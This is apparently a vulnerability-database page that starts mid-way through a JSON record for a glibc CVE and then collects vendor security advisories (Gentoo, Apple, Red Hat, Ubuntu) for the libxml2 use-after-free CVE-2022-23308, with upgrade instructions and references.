{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3600"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24586"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20239"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3732"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28950"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31916"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20095"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28493"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42771"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26301"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26301"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28957"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20095"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28493"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-32690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4902"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3801"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23369"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23383"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23369"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23383"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4032"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/distr_tracing/distr_tracing_install/distr-tracing-updating.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/distr_tracing/distributed-tracing-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0318"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36221"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3426"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "164863"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166051"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165002"
},
{
"db": "PACKETSTORM",
"id": "165758"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
},
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-393646",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-33574",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165286",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164863",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166051",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164967",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165096",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165129",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165002",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165758",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-33574",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-05-25T00:00:00",
"db": "VULHUB",
"id": "VHN-393646",
"ident": null
},
{
"date": "2021-05-25T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33574",
"ident": null
},
{
"date": "2021-12-15T15:20:33",
"db": "PACKETSTORM",
"id": "165286",
"ident": null
},
{
"date": "2021-11-10T17:08:43",
"db": "PACKETSTORM",
"id": "164863",
"ident": null
},
{
"date": "2022-01-20T17:48:29",
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"date": "2022-02-18T16:37:39",
"db": "PACKETSTORM",
"id": "166051",
"ident": null
},
{
"date": "2021-11-15T17:25:56",
"db": "PACKETSTORM",
"id": "164967",
"ident": null
},
{
"date": "2021-11-29T18:12:32",
"db": "PACKETSTORM",
"id": "165096",
"ident": null
},
{
"date": "2021-12-02T16:06:16",
"db": "PACKETSTORM",
"id": "165129",
"ident": null
},
{
"date": "2021-11-17T15:25:40",
"db": "PACKETSTORM",
"id": "165002",
"ident": null
},
{
"date": "2022-01-28T14:33:13",
"db": "PACKETSTORM",
"id": "165758",
"ident": null
},
{
"date": "2021-05-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1666",
"ident": null
},
{
"date": "2021-05-25T22:15:10.410000",
"db": "NVD",
"id": "CVE-2021-33574",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-11-08T00:00:00",
"db": "VULHUB",
"id": "VHN-393646",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33574",
"ident": null
},
{
"date": "2022-10-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1666",
"ident": null
},
{
"date": "2023-11-07T03:35:52.810000",
"db": "NVD",
"id": "CVE-2021-33574",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "GNU C Library Resource Management Error Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
}
],
"trust": 0.6
}
}
VAR-202202-0906
Vulnerability from variot - Updated: 2026-03-09 22:00valid.c in libxml2 before 2.9.13 has a use-after-free of ID and IDREF attributes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202210-03
https://security.gentoo.org/
Severity: High Title: libxml2: Multiple Vulnerabilities Date: October 16, 2022 Bugs: #833809, #842261, #865727 ID: 202210-03
Synopsis
Multiple vulnerabilities have been discovered in libxml2, the worst of which could result in arbitrary code execution.
Background
libxml2 is the XML C parser and toolkit developed for the GNOME project.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.10.2 >= 2.10.2
Description
Multiple vulnerabilities have been discovered in libxml2. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All libxml2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.10.2"
References
[ 1 ] CVE-2022-23308 https://nvd.nist.gov/vuln/detail/CVE-2022-23308 [ 2 ] CVE-2022-29824 https://nvd.nist.gov/vuln/detail/CVE-2022-29824
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202210-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2022-05-16-1 iOS 15.5 and iPadOS 15.5
iOS 15.5 and iPadOS 15.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213258.
AppleAVD Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-26702: an anonymous researcher
AppleGraphicsControl Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative
AVEVideoEncoder Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-26736: an anonymous researcher CVE-2022-26737: an anonymous researcher CVE-2022-26738: an anonymous researcher CVE-2022-26739: an anonymous researcher CVE-2022-26740: an anonymous researcher
DriverKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An out-of-bounds access issue was addressed with improved bounds checking. CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)
GPU Drivers Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-26744: an anonymous researcher
ImageIO Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow issue was addressed with improved input validation. CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative
IOKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved locking. CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab
IOMobileFrameBuffer Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-26768: an anonymous researcher
IOSurfaceAccelerator Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-26771: an anonymous researcher
Kernel Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved validation. CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs_sg)
Kernel Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2022-26757: Ned Williamson of Google Project Zero
Kernel Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations Description: A memory corruption issue was addressed with improved validation. CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)
Kernel Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication Description: A race condition was addressed with improved state handling. CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)
LaunchServices Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: An access issue was addressed with additional sandbox restrictions on third-party applications. CVE-2022-26706: Arsenii Kostromin (0x3c3e)
libxml2 Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2022-23308
Notes Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing a large input may lead to a denial of service Description: This issue was addressed with improved checks. CVE-2022-22673: Abhay Kailasia (@abhay_kailasia) of Lakshmi Narain College Of Technology Bhopal
Safari Private Browsing Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious website may be able to track users in Safari private browsing mode Description: A logic issue was addressed with improved state management. CVE-2022-26731: an anonymous researcher
Security Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious app may be able to bypass signature validation Description: A certificate parsing issue was addressed with improved checks. CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)
Shortcuts Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A person with physical access to an iOS device may be able to access photos from the lock screen Description: An authorization issue was addressed with improved state management. CVE-2022-26703: Salman Syed (@slmnsd551)
WebKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing maliciously crafted web content may lead to code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 238178 CVE-2022-26700: ryuzaki
WebKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 236950 CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab WebKit Bugzilla: 237475 CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab WebKit Bugzilla: 238171 CVE-2022-26717: Jeonghoon Shin of Theori
WebKit Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 238183 CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab WebKit Bugzilla: 238699 CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech
WebRTC Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: Video self-preview in a webRTC call may be interrupted if the user answers a phone call Description: A logic issue in the handling of concurrent media was addressed with improved state handling. WebKit Bugzilla: 237524 CVE-2022-22677: an anonymous researcher
Wi-Fi Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may disclose restricted memory Description: A memory corruption issue was addressed with improved validation. CVE-2022-26745: an anonymous researcher
Wi-Fi Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may be able to elevate privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-26760: 08Tc3wBB of ZecOps Mobile EDR Team
Wi-Fi Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2015-4142: Kostya Kortchinsky of Google Security Team
Wi-Fi Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2022-26762: Wang Yu of Cyberserval
Additional recognition
AppleMobileFileIntegrity We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing for their assistance.
FaceTime We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing for their assistance.
WebKit We would like to acknowledge James Lee, an anonymous researcher for their assistance.
Wi-Fi We would like to acknowledge 08Tc3wBB of ZecOps Mobile EDR Team for their assistance.
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 15.5 and iPadOS 15.5". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TQACgkQeC9qKD1p rhh9PRAApeuHnWvZRxSW/QArItDF2fA1eXCu7n9BwPA6CoqrU7v7aR6H/NQ3wes6 xOjoRccHRCWRJ12RubM06ggC+WA/MLb96t2Wc4IUoFDkI3G6fp/I3aHpSONv4YMt EoHSGMpJ3qAb6Z60mIMcshsCtyv9k4LxpjOTnHKRLp/M4JLWG4CanOGpN2u/wPPV TpRY4jkZlAdvQK3qrPmA8aO5sWnbh5l//kUS6IL649seZQFUeZdz7QUyodjjqr2/ XWyqsQC4mqVphxwvWDWA5J6/Zf7C7hNdZ1BE+SPpLhjEZlU6IYBFY2PLrg9NDTv8 YMZpftlm5HQo3qmy/HLoiF8bIqgtdz+TpgNiT+TYz9+/pvP/hyGbX6xF9esKBVjj +1OUnd2GaLjSdY7o9WOtZgSJQxi1/R1X1+DjY1vI+d/TQZ+Sz58Me90R99aWc+Gc 1B8e6FhjwT48rHJiuIw75ZW1orpUX6OL5vqdge0H1aJXm7EEUhByZvm2E2DajKu2 mp2jr01UZyb3ro0qE1zpNitNORWAdvrlriIJxFVxtxW4MygMn8ThJ/Jz2LjquHvT EwvCyB9jaqPKja3b/dwzf/nowjw+aocxOjelW2Q/HcyR13YF2ZHd1+hNtG/7Isrx WIpI9nNAQQ2LCQIgL7/xCn6Yni9t3le3+eU+cdafoqJKTpETNbk= =OMfW -----END PGP SIGNATURE-----
. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 8. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
- libxml2: Use-after-free of ID and IDREF attributes (CVE-2022-23308)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The desktop must be restarted (log out, then log back in) for this update to take effect. Package List:
Red Hat Enterprise Linux AppStream (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Description:
Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):
2062751 - CVE-2022-24730 argocd: path traversal and improper access control allows leaking out-of-bound files 2062755 - CVE-2022-24731 argocd: path traversal allows leaking out-of-bound files 2064682 - CVE-2022-1025 Openshift-Gitops: Improper access control allows admin privilege escalation
- Description:
This release adds the new Apache HTTP Server 2.4.37 Service Pack 11 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.37 Service Pack 10 and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes and enhancements included in this release. Bugs fixed (https://bugzilla.redhat.com/):
1950515 - CVE-2021-3541 libxml2: Exponential entity expansion attack bypasses all existing protection mechanisms 1954225 - CVE-2021-3516 libxml2: Use-after-free in xmlEncodeEntitiesInternal() in entities.c 1954232 - CVE-2021-3517 libxml2: Heap-based buffer overflow in xmlEncodeEntitiesInternal() in entities.c 1954242 - CVE-2021-3518 libxml2: Use-after-free in xmlXIncludeDoProcess() in xinclude.c 1956522 - CVE-2021-3537 libxml2: NULL pointer dereference when post-validating mixed content parsed in recovery mode 2056913 - CVE-2022-23308 libxml2: Use-after-free of ID and IDREF attributes 2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates 2064321 - CVE-2022-22720 httpd: Errors encountered during the discarding of request body lead to HTTP request smuggling
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Gatekeeper Operator v0.2 security updates and bug fixes Advisory ID: RHSA-2022:1081-01 Product: Red Hat ACM Advisory URL: https://access.redhat.com/errata/RHSA-2022:1081 Issue date: 2022-03-28 CVE Names: CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 CVE-2020-16135 CVE-2020-24370 CVE-2021-3200 CVE-2021-3445 CVE-2021-3521 CVE-2021-3580 CVE-2021-3712 CVE-2021-3800 CVE-2021-3999 CVE-2021-20231 CVE-2021-20232 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-23177 CVE-2021-28153 CVE-2021-31566 CVE-2021-33560 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-42574 CVE-2021-43565 CVE-2022-23218 CVE-2022-23219 CVE-2022-23308 CVE-2022-23806 CVE-2022-24407 ==================================================================== 1. Summary:
Gatekeeper Operator v0.2
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Gatekeeper Operator v0.2
Gatekeeper is an open source project that applies the OPA Constraint Framework to enforce policies on your Kubernetes clusters.
This advisory contains the container images for Gatekeeper that include security updates, and container upgrades.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Note: Gatekeeper support from the Red Hat support team is limited cases where it is integrated and used with Red Hat Advanced Cluster Management for Kubernetes. For support options for any other use, see the Gatekeeper open source project website at: https://open-policy-agent.github.io/gatekeeper/website/docs/howto/.
Security updates:
-
golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
-
golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
The requirements to apply the upgraded images are different whether or not you used the operator. Complete the following steps, depending on your installation:
-
- Upgrade gatekeeper operator:
The gatekeeper operator that is installed by the gatekeeper operator policy
has
installPlanApprovalset toAutomatic. This setting means the operator will be upgraded automatically when there is a new version of the operator. No further action is required for upgrade. If you changed the setting forinstallPlanApprovaltomanual, then you must view each cluster to manually approve the upgrade to the operator.
- Upgrade gatekeeper operator:
The gatekeeper operator that is installed by the gatekeeper operator policy
has
-
- Upgrade gatekeeper without the operator: The gatekeeper version is specified as part of the Gatekeeper CR in the gatekeeper operator policy. To upgrade the gatekeeper version: a) Determine the latest version of gatekeeper by visiting: https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. b) Click the tag dropdown, and find the latest static tag. An example tag is 'v3.3.0-1'. c) Edit the gatekeeper operator policy and update the image tag to use the latest static tag. For example, you might change this line to image: 'registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1'.
Refer to https://open-policy-agent.github.io/gatekeeper/website/docs/howto/ for additional information.
- Bugs fixed (https://bugzilla.redhat.com/):
2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements
- References:
https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-12762 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-16135 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3445 https://access.redhat.com/security/cve/CVE-2021-3521 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3712 https://access.redhat.com/security/cve/CVE-2021-3800 https://access.redhat.com/security/cve/CVE-2021-3999 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22898 https://access.redhat.com/security/cve/CVE-2021-22925 https://access.redhat.com/security/cve/CVE-2021-23177 https://access.redhat.com/security/cve/CVE-2021-28153 https://access.redhat.com/security/cve/CVE-2021-31566 https://access.redhat.com/security/cve/CVE-2021-33560 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-42574 https://access.redhat.com/security/cve/CVE-2021-43565 https://access.redhat.com/security/cve/CVE-2022-23218 https://access.redhat.com/security/cve/CVE-2022-23219 https://access.redhat.com/security/cve/CVE-2022-23308 https://access.redhat.com/security/cve/CVE-2022-23806 https://access.redhat.com/security/cve/CVE-2022-24407 https://access.redhat.com/security/updates/classification/#moderate https://open-policy-agent.github.io/gatekeeper/website/docs/howto/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. ========================================================================== Ubuntu Security Notice USN-5324-1 March 14, 2022
libxml2 vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.10
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
libxml2 could be made to crash or run programs if it opened a specially crafted file. An attacker could use this issue to cause libxml2 to crash, resulting in a denial of service, or possibly execute arbitrary code.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.10: libxml2 2.9.12+dfsg-4ubuntu0.1 libxml2-utils 2.9.12+dfsg-4ubuntu0.1
Ubuntu 20.04 LTS: libxml2 2.9.10+dfsg-5ubuntu0.20.04.2 libxml2-utils 2.9.10+dfsg-5ubuntu0.20.04.2
Ubuntu 18.04 LTS: libxml2 2.9.4+dfsg1-6.1ubuntu1.5 libxml2-utils 2.9.4+dfsg1-6.1ubuntu1.5
In general, a standard system update will make all the necessary changes
Show details on source website{
